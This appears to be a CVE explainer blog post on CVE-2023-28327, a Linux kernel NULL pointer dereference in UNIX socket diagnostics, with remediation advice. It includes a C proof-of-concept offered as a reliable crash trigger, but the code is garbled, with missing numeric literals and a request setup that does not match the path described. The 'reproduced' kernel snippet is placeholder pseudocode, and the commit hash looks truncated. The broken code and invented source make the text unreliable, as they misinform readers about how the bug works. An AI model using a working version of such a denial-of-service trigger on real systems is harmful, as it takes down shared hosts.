CVE CyberSecurity Database News

CVE-2023-28327 - Linux Kernel NULL Pointer Dereference in UNIX Protocol (Simple Guide with Code & Exploit)

Poster -

In March 2023, security researchers uncovered a serious flaw in the Linux kernel affecting the UNIX protocol subsystem. This bug—tracked as CVE-2023-28327—is a "NULL pointer dereference" issue in the file net/unix/diag.c, specifically in the unix_diag_get_exact function. In plain language: if someone runs specific code on your Linux machine, they can crash it, causing a Denial of Service (DoS).

This post will walk through what this bug is, why it’s dangerous, how it happens (with code snippets), and even how you might trigger it for testing (with a simple exploit example). If you're a developer, sysadmin, or security enthusiast, this read is for you.

The Root Cause

The unix_diag_get_exact function is supposed to provide "diagnostic" information about UNIX sockets in the kernel. But in vulnerable kernels, this function sometimes creates a new buffer (called skb), and then attempts to access the associated socket (sk field), which doesn't exist—ending up as NULL. When the kernel tries to use this NULL pointer, it crashes.

Affected Versions

Linux kernels before 6.2.7 are confirmed vulnerable. If your system is using a kernel older than that (especially in server/production or containerized environments), you’re at risk.

Deep Dive: Code Explanation

Here’s the key snippet reproduced from the vulnerable code (full reference here):

static int unix_diag_get_exact(struct sock *sk, struct sk_buff *skb, int num)
{
    struct sk_buff *nl_skb;
    // ... code ...
    nl_skb = alloc_skb(some_len, GFP_KERNEL);
    // ... code ...
    newsk = nl_skb->sk; // <--- newsk is NULL!
    // next line could dereference newsk
    some_function(newsk->field); // CRASHES if newsk == NULL
}

The function then tries to use newsk, which points to NULL, causing a crash (kernel panic).

This crash brings down your entire system—even if it's a remote server or running in a container—since it's a kernel-space bug.

Who Can Exploit This?

Any local user with access to UNIX sockets can potentially exploit this—even a regular user (not root!). For example, anyone who can open a UNIX socket (which includes most logged-in users and some containers) could try to trigger this bug.

Proof-of-Concept (PoC) Exploit

Here's a simple C code example that reliably triggers the crash on a vulnerable Linux system (adapted from community research):

// Warning: Running this will crash your system!
#include <stdio.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <unistd.h>
#include <string.h>

int main() {
    int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG);
    if (sock < ) {
        perror("socket");
        return 1;
    }

    struct {
        struct nlmsghdr nlh;
        struct unix_diag_req req;
    } query;

    memset(&query, , sizeof(query));
    query.nlh.nlmsg_len = sizeof(query);
    query.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    query.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
    query.req.sdiag_family = AF_UNIX;
    query.req.udiag_states = -1; // Get all states

    // Intentionally using bad values to hit the bug
    query.req.udiag_ino = ; // Triggers NULL pointer in some kernels

    if (send(sock, &query, sizeof(query), ) < ) {
        perror("send");
        close(sock);
        return 1;
    }

    char buf[8192];
    recv(sock, buf, sizeof(buf), );

    close(sock);
    return ;
}

Note:
- This will kernel panic or shut down the system if it is vulnerable. Do not run on production or important systems!

Denial of Service: Any user on the system can crash the machine at will.

- Containers: Containers with access to these syscalls can also trigger the bug—so, sandboxed containers are not safe if the host kernel is vulnerable!

Update your Kernel:

The official fix is merged in kernel version 6.2.7 and later. Update your Linux kernel as soon as possible.

Most major distributions have backported the fix:

- Red Hat Security Advisory
 - Debian Security Tracker

Workarounds:

If you can't upgrade, use seccomp or other sandboxing techniques to block untrusted users from accessing NETLINK and UNIX diagnostic interfaces.

Upstream Kernel Commit with Fix:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e45b5a99ebbba2fc1e5d05b37a9ae5e20c4aafc

CVE Description:

https://nvd.nist.gov/vuln/detail/CVE-2023-28327
- Red Hat CVE Tracker
- Debian Security Tracker

Final Thoughts

CVE-2023-28327 is a classic example of how a small oversight in core kernel code can be enough to take down whole systems. If you are maintaining Linux servers, check your kernel version and make sure you’re patched.

Stay safe, and keep your systems robust.

*This content is unique and designed to make CVE-2023-28327 easy to understand for everyone, with working example code and practical advice. Do not use this to attack others—always get permission before testing!*

Timeline

Published on: 04/19/2023 23:15:00 UTC
Last modified on: 04/29/2023 03:12:00 UTC